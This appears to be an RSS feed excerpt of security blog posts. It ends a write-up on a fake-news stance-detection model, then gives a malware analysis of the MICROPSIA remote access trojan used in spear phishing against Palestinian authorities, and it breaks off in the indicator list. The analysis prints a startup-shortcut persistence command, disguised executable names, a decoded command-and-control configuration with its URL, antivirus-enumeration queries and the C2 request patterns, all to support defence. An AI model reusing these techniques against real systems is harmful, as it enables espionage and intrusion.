model&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;The architecture of this model was selected due to its ease of implementation and fast computation, since we can rely on convolutions instead of recurrence. Judging from the relative strength of this model, convolutions seem to be able to capture a wide variety of topics; however, the model is limited in that it only gets to observe the text once. 
A potential extension to this model would be to include some sort of attention mechanism with recurrence after the convolutions, which would allow the model to query specific aspects of the headline/body after receiving a general summary from the CNN.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Gradient-Boosted Decision Trees (GBDT) Approach&lt;/h4&gt;&lt;br /&gt;The other model employed in the ensemble is a Gradient-Boosted Decision Trees (&lt;a href="https://en.wikipedia.org/wiki/Gradient_boosting" target="_blank"&gt;GBDT&lt;/a&gt;) model. This model takes a few text-based features derived from the headline and body of an article, which are then fed into gradient-boosted trees to predict the relation between the headline and the body.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-hplmWSR1p-w/WUlDBO30j6I/AAAAAAAAAPU/nKRsYp6SjJM81msMzsn3kBmiGpf7xJ7GwCLcBGAs/s1600/tree_model_dark6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1361" data-original-width="1600" height="544" src="https://1.bp.blogspot.com/-hplmWSR1p-w/WUlDBO30j6I/AAAAAAAAAPU/nKRsYp6SjJM81msMzsn3kBmiGpf7xJ7GwCLcBGAs/s640/tree_model_dark6.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small; text-align: start;"&gt;Diagram outlining our decision tree model&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;After exploring the dataset, a few features that are likely to be informative of headline/body relationships became obvious -- for example:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;The number of overlapping words between the headline and body text;&lt;/li&gt;&lt;li&gt;Similarities measured 
between the word count, 2-grams and 3-grams; and&lt;/li&gt;&lt;li&gt;Similarities measured after transforming these counts with term frequency-inverse document frequency (&lt;a href="https://en.wikipedia.org/wiki/Tf%E2%80%93idf" target="_blank"&gt;TF-IDF&lt;/a&gt;) weighting and Singular Value Decomposition (&lt;a href="https://en.wikipedia.org/wiki/Singular_value_decomposition" target="_blank"&gt;SVD&lt;/a&gt;).&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Given these features, a powerful and highly expressive model is not necessary to learn the complex mapping from the features to the stance label.&lt;br /&gt;&lt;br /&gt;For this, Gradient-Boosted Decision Trees were chosen because of the model’s robustness with regard to the different scales of our feature vectors. &amp;nbsp;Specifically, no normalization is needed, and the model can be regularized in several different ways to avoid overfitting. Furthermore, &lt;a href="https://github.com/dmlc/xgboost" target="_blank"&gt;XGBoost&lt;/a&gt; is a very efficient, open-source implementation that was easily applied to the handcrafted features.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: right;"&gt;&lt;/div&gt;&lt;h4&gt;Real World Exercise&lt;/h4&gt;&lt;br /&gt;Some readers may be wondering what the output of our system looks like on real-world data. &amp;nbsp;As a fun exercise, we ran the contents of a first draft of this blog post through our system with various headlines -- the real headline of the post, and a few others we made up for the sake of this activity. 
&amp;nbsp;These headlines are:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Talos Targets Disinformation with Fake News Challenge Victory (the real headline);&lt;/li&gt;&lt;li&gt;Team Loses Fake News Challenge;&lt;/li&gt;&lt;li&gt;Research Shows Fake News is Unsolvable; and&lt;/li&gt;&lt;li&gt;Giraffe Livestream Continues to Fourth Week with No Action.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;We were excited to see whether or not our models would be able to correctly detect the stance of our blog post with each of these headlines. &amp;nbsp;The results can be found in the figure below:&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-b1qO5M633HQ/WUlDMNU285I/AAAAAAAAAPc/FFgeo_8xnGgeEuIC0ghklTIwdXCOdWqrACLcBGAs/s1600/blog_titles_dark7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1600" data-original-width="1368" height="640" src="https://2.bp.blogspot.com/-b1qO5M633HQ/WUlDMNU285I/AAAAAAAAAPc/FFgeo_8xnGgeEuIC0ghklTIwdXCOdWqrACLcBGAs/s640/blog_titles_dark7.png" width="546" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small; text-align: start;"&gt;Results of this blog post and various test headlines being evaluated by our system&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;As shown above, while neither the deep learning approach nor the GBDT approach had perfect accuracy, the combination of these two approaches with a 50/50 weighting detected the correct stance for each headline.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;&lt;br /&gt;In the end, these innovative model implementations put &lt;a href="http://www.fakenewschallenge.org/#fnc1results" target="_blank"&gt;Talos on top 
of the global leaderboard&lt;/a&gt;. &amp;nbsp;While more research needs to be done, Talos’s award-winning research on stance detection is an important first step toward tackling the problem of fake news and disinformation in the 21st century. &lt;br /&gt;&lt;br /&gt;As the Fake News Challenge moves forward and the natural language processing community continues to churn out cutting-edge research, Talos remains committed to continually forcing the bad guys to innovate.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=FtoD2o9EqnI:eeA9q71YvE4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/FtoD2o9EqnI" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-21T08:43:57.912-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-fXzLj0mZDLs/WUlByfuNujI/AAAAAAAAAPA/RpwB6P67lCwNkGBhuEeCMuqvpD0G5kRGACLcBGAs/s72-c/TalosInTheNews1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/talos-fake-news-challenge.html</feedburner:origLink></item><item><title>Delphi Used To Score Against Palestine</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/UdXRBd5VW9A/palestine-delphi.html</link><category>Palestine</category><category>RAT</category><category>Talos</category><category>Threat Research</category><author>noreply@blogger.com (Warren Mercer)</author><pubDate>Mon, 19 Jun 2017 08:48:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-966413230305129216</guid><description>This blog was authored by &lt;a href="https://www.blogger.com/profile/10073079939160046441"&gt;Paul Rascagneres&lt;/a&gt; and &lt;a href="http://blogs.cisco.com/author/warrenmercer"&gt;Warren Mercer&lt;/a&gt;&amp;nbsp;with contributions from &lt;a href="https://blogs.cisco.com/author/emmanueltacheau"&gt;Emmanuel Tacheau&lt;/a&gt;,&amp;nbsp;&lt;a href="https://www.blogger.com/profile/18152595187998952871"&gt;Vanja Svajcer&lt;/a&gt; and &lt;a href="https://www.blogger.com/profile/17941683095374027310"&gt;Martin Lee&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.3ib9qkmn7w54"&gt;Executive Summary&lt;/h2&gt;&lt;br /&gt;Talos continuously monitors malicious email campaigns. 
We identified one specific spear phishing campaign launched against targets within Palestine, and specifically against Palestinian law enforcement agencies. The campaign started in April 2017 and used spear phishing emails to deliver the MICROPSIA payload in order to remotely control infected systems. Although this technique is not new, it remains effective for attackers.&lt;br /&gt;&lt;br /&gt;The malware itself was developed in Delphi; in this article, we describe its features and its network communication with the command and control server used by the attackers. The threat actor has chosen to reference TV show characters and include German words within the attack. Most significantly, the attacker appears to have used genuine documents stolen from Palestinian sources, as well as a controversial music video, as part of the attack. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.lbywxgmnsh4g"&gt;Spear Phishing Campaign&lt;/h2&gt;&lt;br /&gt;We identified a spear phishing campaign that appeared to be targeting members of the Palestinian law enforcement services as well as other Palestinian targets in the public sector. 
The email purports to be sent from an individual named "Yasser Saad", but the apparent name does not match the email address '&lt;a href="mailto:yassersaaid01@gmail.com"&gt;yassersaaid01@gmail.com&lt;/a&gt;', which suggests "Yasser Saaid".&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-3a42reuT9u0/WUftPtxDtnI/AAAAAAAAATo/4DKV8eEdl5wfFFexC9q8euth1clcSj1fwCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="436" data-original-width="1600" height="174" src="https://3.bp.blogspot.com/-3a42reuT9u0/WUftPtxDtnI/AAAAAAAAATo/4DKV8eEdl5wfFFexC9q8euth1clcSj1fwCLcBGAs/s640/image2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;The subject of the email translates to "Brothers security officers and directors", with the text content "Kindly to view and circulate under the responsibility:&lt;br /&gt;The Council of Ministers' Decision on the Use of the Internet in Government Institutions"&lt;br /&gt;&lt;br /&gt;Attached to the email is a .r10 file, an extension which suggests that the file is the tenth part of a split RAR archive. However, this isn't the case: the attachment is a simple RAR file. Despite the unusual file name extension, this file can be opened by many RAR archive handlers without modification. &lt;br /&gt;&lt;br /&gt;The RAR archive contains a single executable file named: InternetPolicy_65573247239876023_3247648974234_32487234235667_pdf.exe&lt;br /&gt;&lt;br /&gt;The .r10 file extension may have been chosen in order to confuse automated file parsing systems that check for malicious contents of archives with known file name extensions. Similarly, the long name of the file within the archive, along with the ending '_pdf.exe', may have been intended to convince victims that the file is a real PDF file. 
It is worth keeping in mind that by default Windows will not show the .exe extension to the user. The icon of the executable itself is the one commonly used for PDF files, reinforcing the impression that the archive contains a PDF.&lt;br /&gt;&lt;br /&gt;When the executable is launched it extracts the decoy document embedded as the PE resource named Resource_1 and opens it.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.e9om8fxbuzcl"&gt;Decoy Document&lt;/h3&gt;&lt;br /&gt;The decoy document displayed, InternetPolicy.pdf, is a scanned document from the Ministry of Interior of the State of Palestine, signed by Dr Alaa Mousa, Minister of Communications &amp;amp; Technologies:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-VTBikCk-Rdw/WUftVP1oi-I/AAAAAAAAATs/B711nmvYeRcpehemiGN1VouC_YQ2ON3-ACLcBGAs/s1600/image8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1411" data-original-width="1044" height="640" src="https://1.bp.blogspot.com/-VTBikCk-Rdw/WUftVP1oi-I/AAAAAAAAATs/B711nmvYeRcpehemiGN1VouC_YQ2ON3-ACLcBGAs/s640/image8.png" width="472" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;The decoy document contains 7 pages describing new internet usage policies. The first page (shown above) informs governmental departments of the policy and instructs them to follow it. A handwritten note, stated to be from the Director of the IT Department, adds his 'seal of approval' to the document.&lt;br /&gt;&lt;br /&gt;In the background, the MICROPSIA malware is executed on the infected system. 
This malware is a Remote Administration Tool (RAT); it is described in detail below.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.kaqrkq3hrcn7"&gt;Associated Campaigns&lt;/h2&gt;&lt;br /&gt;We have also identified drive-by download campaigns which are distributing variants of the same malware, but with different decoy documents.&lt;br /&gt;&lt;br /&gt;URLs used in this campaign include:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;http://sheldon-cooper[.]info/Fuqha_NewDetails_docx.r10&lt;/li&gt;&lt;li&gt;http://feteh-asefa[.]com/pc/public/Fuqha_NewDetails_docx.r10&lt;/li&gt;&lt;li&gt;http://feteh-asefa[.]com/pc/public/Altarnatevs.r10&lt;/li&gt;&lt;li&gt;https://sheldon-cooper[.]info/attachment.r10&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;As with the spear phish, the archives have the same .r10 extension. The first two archives contain the file Fuqha_NewDetails_874918321795_39778423423094_1988734200039_docx.exe; although the file name suggests a .docx file, the icon is that of a PDF document.&lt;br /&gt;&lt;br /&gt;The second two archives contain the file Altarnatives_Palestine_89840923498679852_9879483278432732489_pdf.exe, again an executable file with a PDF-style icon.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.x2eg478ars49"&gt;Decoy Documents&lt;/h3&gt;&lt;br /&gt;&lt;h4 id="h.ktbt9l8tcx1f"&gt;Altarnatives_Palestine Document&lt;/h4&gt;&lt;br /&gt;The .pdf decoy document is a study from the Palestinian Center for Policy Research and Strategic Studies (MASARAT): &lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-yROszkBAVzY/WUftbDF0ubI/AAAAAAAAATw/FrjxSdzUrkYXLm_AEZxO7PUTlsKBytzegCLcBGAs/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1299" data-original-width="976" height="640" src="https://1.bp.blogspot.com/-yROszkBAVzY/WUftbDF0ubI/AAAAAAAAATw/FrjxSdzUrkYXLm_AEZxO7PUTlsKBytzegCLcBGAs/s640/image6.png" width="480" 
/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;This 22-page research document addresses the current level of threat &amp;amp; security issues within the West Bank for 2016 &amp;amp; 2017. It contains chapters relating to human rights, data from the Arab World for Research and Development center, a violence center report, etc.&lt;br /&gt;&lt;br /&gt;&lt;h4 id="h.njabpcn4p3jy"&gt;Fuqha_NewDetails Document&lt;/h4&gt;&lt;br /&gt;This 8-page document appears to be an intelligence report based on interviews, documents and public information. The document mentions an assassination report of one of the highest-ranked officers of the Al Qassam group (the military wing of HAMAS, aka Armed Militia). The document contains a single image, an illustration of the leadership of Hamas and its hierarchical security &amp;amp; subgroups:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-i67ZadIH5Gk/WUftfUvtGFI/AAAAAAAAAT0/zI9t6pCeQYEoWXaHnMEwX3SodZEnGHfGACLcBGAs/s1600/image11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1012" data-original-width="1356" height="476" src="https://2.bp.blogspot.com/-i67ZadIH5Gk/WUftfUvtGFI/AAAAAAAAAT0/zI9t6pCeQYEoWXaHnMEwX3SodZEnGHfGACLcBGAs/s640/image11.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.ge6voyei1hbi"&gt;Further Campaigns&lt;/h2&gt;&lt;br /&gt;We also identified additional, related malicious documents which conform to the same naming pattern and which share indicators with the original malware we discovered.&lt;br /&gt;&lt;br /&gt;&lt;h4 id="h.kxzoyb47xhog"&gt;Plan_Palestine Document&lt;/h4&gt;&lt;br /&gt;Plan_Palestine_898409266595123498679852_9879483278432732489_pdf.exe&lt;br /&gt;&lt;br /&gt;The decoy document of this sample is a Word document. 
It presents the strategic objectives, policies and interventions concerning security units (aka Police), including how to face the challenges, how to train police, new weapons, etc.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-4kIGYDSNWy8/WUftj5JCdXI/AAAAAAAAAT4/wXxw3SP7zFAJp66w5ry1--Ki_OIv-HgEQCLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="963" data-original-width="1391" height="442" src="https://2.bp.blogspot.com/-4kIGYDSNWy8/WUftj5JCdXI/AAAAAAAAAT4/wXxw3SP7zFAJp66w5ry1--Ki_OIv-HgEQCLcBGAs/s640/image3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4 id="h.r9dmg4v7ay7x"&gt;Diwan2017_Palestine Document&lt;/h4&gt;&lt;br /&gt;Diwan2017_Palestine_89840923498679852_9879483278432732489_pdf.exe&lt;br /&gt;&lt;br /&gt;This decoy document is a PDF file. The document itself appears to be scanned from the Council of Ministers of Palestine and relates to an announcement concerning employee regulation.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-RnBkCYh_nBg/WUftot1kwjI/AAAAAAAAAT8/7ZIsg_Qg3wUWp8i_wgQF5MARG3nORhELwCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="740" data-original-width="1243" height="380" src="https://2.bp.blogspot.com/-RnBkCYh_nBg/WUftot1kwjI/AAAAAAAAAT8/7ZIsg_Qg3wUWp8i_wgQF5MARG3nORhELwCLcBGAs/s640/image4.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4 id="h.6z3wqvgglusc"&gt;Goal2017 Document&lt;/h4&gt;&lt;br /&gt;Goal2017_487886_10152599711675287_250999354_n_354343741352mp4.exe&lt;br /&gt;&lt;br /&gt;Instead of a decoy document, this sample displays a decoy video: the music clip "Goal" by the Lebanese singers Myriam Klink and Jad Khalife. 
This video is particularly controversial, as its overt nature led it to be &lt;a href="http://gulfnews.com/news/mena/lebanon/lebanese-pop-singer-s-song-goal-banned-1.1989080"&gt;banned&lt;/a&gt; by the Lebanese Justice ministry. Sharing or airing it is subject to a fine of 50 000 000 Lebanese Liras (approximately 33k USD).&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-Z1YWVvlDAQY/WUftuybsOuI/AAAAAAAAAUA/MgYlC2x1QUkWguyFZPAdABo9SmNhR_I6wCLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1124" data-original-width="1600" height="448" src="https://2.bp.blogspot.com/-Z1YWVvlDAQY/WUftuybsOuI/AAAAAAAAAUA/MgYlC2x1QUkWguyFZPAdABo9SmNhR_I6wCLcBGAs/s640/image1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2 id="h.qp114fnr5rbi"&gt;MICROPSIA Analysis&lt;/h2&gt;&lt;br /&gt;For all of these decoy documents, the malware is identical; the only differences are the sections containing the decoy documents themselves. The malware is a remote access trojan (RAT) written in Delphi, named MICROPSIA.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.s648ug5mqht7"&gt;Features&lt;/h3&gt;&lt;br /&gt;Firstly, the malware copies itself to C:\ProgramData\MediaPlayer\ExecuteLibrary.exe. The malware contains several resources, one of which is the decoy document; another is a legitimate binary developed by OptimumX named shortcut.exe. As expected, the purpose of this tool is to create a shortcut. 
It is by creating a shortcut in the user's Startup folder that the malware ensures its persistence:&lt;br /&gt;&lt;br /&gt;Shortcut.exe /f:"C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\D_Windows_v1.lnk" /a:c /t:"C:\ProgramData\MediaPlayer\ExecuteLibrary.exe"&lt;br /&gt;&lt;br /&gt;The malware is a Remote Administration Tool (RAT) which downloads and executes an executable obtained from the Command &amp;amp; Control infrastructure. This executable is downloaded in string format and then converted into a binary file with the Hex2Bin Delphi API.&lt;br /&gt;&lt;br /&gt;An interesting element is the obfuscation algorithm used to hide the configuration of the RAT. The variables are stored in a custom base64:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-jVsLyDrA1bM/WUftzgWMn8I/AAAAAAAAAUE/0yRKg-hIi_AYtX9CD_JNIzUQ1YDj4NuKwCLcBGAs/s1600/image10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="245" data-original-width="1165" height="134" src="https://4.bp.blogspot.com/-jVsLyDrA1bM/WUftzgWMn8I/AAAAAAAAAUE/0yRKg-hIi_AYtX9CD_JNIzUQ1YDj4NuKwCLcBGAs/s640/image10.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Once decoded with base64 and with 2 XOR keys, we obtain the configuration of the malware:&lt;br /&gt;&lt;br /&gt;[{000214A0-0000-0000-C000-000000000046}]&lt;br /&gt;Prop3=19,2&lt;br /&gt;[InternetShortcut]&lt;br /&gt;IDList=&lt;br /&gt;URL=file://&lt;br /&gt;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&lt;br /&gt;http://camilleoconnell.website/api/white_walkers/&lt;br /&gt;daenerys&lt;br /&gt;betriebssystem&lt;br /&gt;anwendung&lt;br /&gt;mikasa&lt;br /&gt;ackerman&lt;br /&gt;ginny&lt;br /&gt;AV&lt;br /&gt;&lt;br /&gt;We will see later that this configuration contains the User-Agent, the CC URL and the JSON keys used for the network communication.&lt;br /&gt;&lt;br 
/&gt;Additionally, the malware is interested in the Anti-Virus software installed on the system. It uses WMI queries to get this information:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;SELECT * FROM AntiVirusProduct&lt;/li&gt;&lt;li&gt;SELECT * FROM AntiSpywareProduct&lt;/li&gt;&lt;li&gt;SELECT * FROM FirewallProduct&lt;/li&gt;&lt;/ul&gt;If a security product is installed, this information is sent to the attacker.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.ymt85pkt0l8p"&gt;Network Communication&lt;/h3&gt;&lt;br /&gt;All the network parameters are stored in the sample and can be easily updated by the author. The CnC is a web server: http://camilleoconnell[.]website&lt;br /&gt;&lt;br /&gt;The network communication is performed over HTTP. The malware uses a hardcoded User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&lt;br /&gt;&lt;br /&gt;To register a new infected system, the malware performs a POST request to /api/white_walkers/new with data on the compromised system consisting of: &lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;the filename of the executed malware and its version;&lt;/li&gt;&lt;li&gt;the version of the infected Operating System;&lt;/li&gt;&lt;li&gt;the hostname and username, encoded in base64.&lt;/li&gt;&lt;/ul&gt;The CC replies in JSON format. The JSON object contains an ID (incremented each time an infected system is registered) and 3 other boolean values: load_varys, lma and ausfart. 
Here is the output of a registration:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-c7jdXV_jcVo/WUft5aZFMvI/AAAAAAAAAUI/Ubz3G-hRB6Eblo2bAnEF4Z__as8KmiXgQCLcBGAs/s1600/image7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1368" data-original-width="1289" height="640" src="https://1.bp.blogspot.com/-c7jdXV_jcVo/WUft5aZFMvI/AAAAAAAAAUI/Ubz3G-hRB6Eblo2bAnEF4Z__as8KmiXgQCLcBGAs/s640/image7.png" width="602" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Based on our investigation, we believe that more than 500 systems are currently registered on the CC. This number may be a mix of genuinely infected systems and security researcher sandbox systems.&lt;br /&gt;&lt;br /&gt;After registration, the malware periodically performs HTTP requests to the CC with the following pattern: GET /api/white_walkers/[base64_data_previously_sent]/requests&lt;br /&gt;&lt;br /&gt;The server replies with a JSON object. We assume that the server can issue orders to the infected system. 
Here is an example:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-99p4DZfrd4o/WUft_PKymUI/AAAAAAAAAUM/_9rVBD3KQ1sUsI262ppR-RX5cgY7hI_OQCLcBGAs/s1600/image9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="680" data-original-width="1464" height="296" src="https://2.bp.blogspot.com/-99p4DZfrd4o/WUft_PKymUI/AAAAAAAAAUM/_9rVBD3KQ1sUsI262ppR-RX5cgY7hI_OQCLcBGAs/s640/image9.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.pgw1sv2vz9nk"&gt;Reference to TV Show Characters&lt;/h3&gt;&lt;br /&gt;In the analysed variant, we identified several references to TV show characters in the network communication and the URLs used by this actor:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;sheldon-cooper[.]info: this domain is a reference to one of the main characters of "The Big Bang Theory", Sheldon Cooper;&lt;/li&gt;&lt;li&gt;camilleoconnell[.]website: this domain is a reference to Camille O'Connell, the main actress of "The Vampire Diaries" and "The Originals";&lt;/li&gt;&lt;li&gt;Mikasa Ackerman is a JSON key returned by the CC, and the name of a character in "Attack on Titan";&lt;/li&gt;&lt;li&gt;/White_Walker/ in the URL is a species in the TV show "Game of Thrones";&lt;/li&gt;&lt;li&gt;Daenerys is a variable used during the web request. This is the name of a character in "Game of Thrones";&lt;/li&gt;&lt;li&gt;Lord_varys is another JSON key returned by the CC. This is the name of a "Game of Thrones" character.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;The malware author appears to have a real interest in TV shows.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.wskswv4247aj"&gt;Goethe's Style&lt;/h3&gt;&lt;br /&gt;We identified the use of German words in the network communication with the Command and Control server.&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;"Betriebssystem", which means Operating System. 
This variable is used to send the OS version (for example "Windows 7 Service Pack 1 (Version 6.1, Build 7601, 32-bit Edition)");&lt;/li&gt;&lt;li&gt;"Anwendung", which means Application. This variable is used to send the filename and the version of the malware;&lt;/li&gt;&lt;li&gt;"Ausfahrt", which means Exit. This is a JSON key used by the CC during network communication. The key contains a boolean (false/true).&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;Obviously, the use of German words does not necessarily mean that the author is German. The author could simply be adding German words in order to cover their tracks.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.pnupqfp5hnx9"&gt;Conclusion&lt;/h2&gt;&lt;br /&gt;This spear phishing campaign was directed against Palestinian authorities and possibly against other entities. At least 500 machines have been registered by the CC infrastructure, which is still operating, indicating that this is a successful campaign.&lt;br /&gt;&lt;br /&gt;At Talos, we have in-depth experience of many APT campaigns; in this case, one of the most surprising elements is the overt naming convention: the author deliberately uses references to several US TV shows and intentionally uses German words in the malware communication. We have no indication whether these inclusions are meant to confuse attribution, to mock analysts, or are simply a lapse in tradecraft. 
This is in contrast to the highly convincing decoy documents, which appear to be copies of genuine documents relating to the current situation in Palestine and which suggest a high degree of professionalism.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.2fgixc2s1066"&gt;IOCs&lt;/h2&gt;&lt;br /&gt;&lt;h3 id="h.wh86gl8glcyp"&gt;File hashes&lt;/h3&gt;&lt;br /&gt;InternetPolicy.r10: 9b162f43bcbfaef4e7e7bdffcf82b7512fac0fe81b7f2c172e1972e5fe4c9327&lt;br /&gt;&lt;br /&gt;InternetPolicy_65573247239876023_3247648974234_32487234235667_pdf.exe: 9cb5ef0b17eea1a43d5d323277e08645574c53ab1f65b0031a6fc323f52b0079&lt;br /&gt;&lt;br /&gt;Attachment.r10: c7081b00ad8db62519c7af2cb5f493f56ecc487b087ae52d01f43953d2aa6952&lt;br /&gt;&lt;br /&gt;Altarnatives_Palestine_89840923498679852_9879483278432732489_pdf.exe: 0180e2b601ae643e7adf1784c313dd2d10d114bd2b5692eb6e9c031a6e448ed1&lt;br /&gt;&lt;br /&gt;Fuqha_NewDetails_docx.r10: 94902877b2cb523548a272d4e4fe0789192e1cb35b531297368b16a2865b33af&lt;br /&gt;&lt;br /&gt;Fuqha_NewDetails_874918321795_39778423423094_1988734200039_docx.exe: 77adba034d13b570c6aab79282326a1eb2efdfc14fbd7cd0651906e3fa31f9fe&lt;br /&gt;&lt;br /&gt;Plan_Palestine_898409266595123498679852_9879483278432732489_pdf.exe: 6c5884cf45d943f51566ea98113fecf851d49f59b70c8039aa21a14e09e21e5c&lt;br /&gt;&lt;br /&gt;Diwan2017_Palestine_89840923498679852_9879483278432732489_pdf.exe: 7c87f992674b962269d7fb2ffbad6d21f606c90d151a6fb67ac54387b6883aae&lt;br /&gt;&lt;br /&gt;Goal2017_487886_10152599711675287_250999354_n_354343741352mp4.exe: 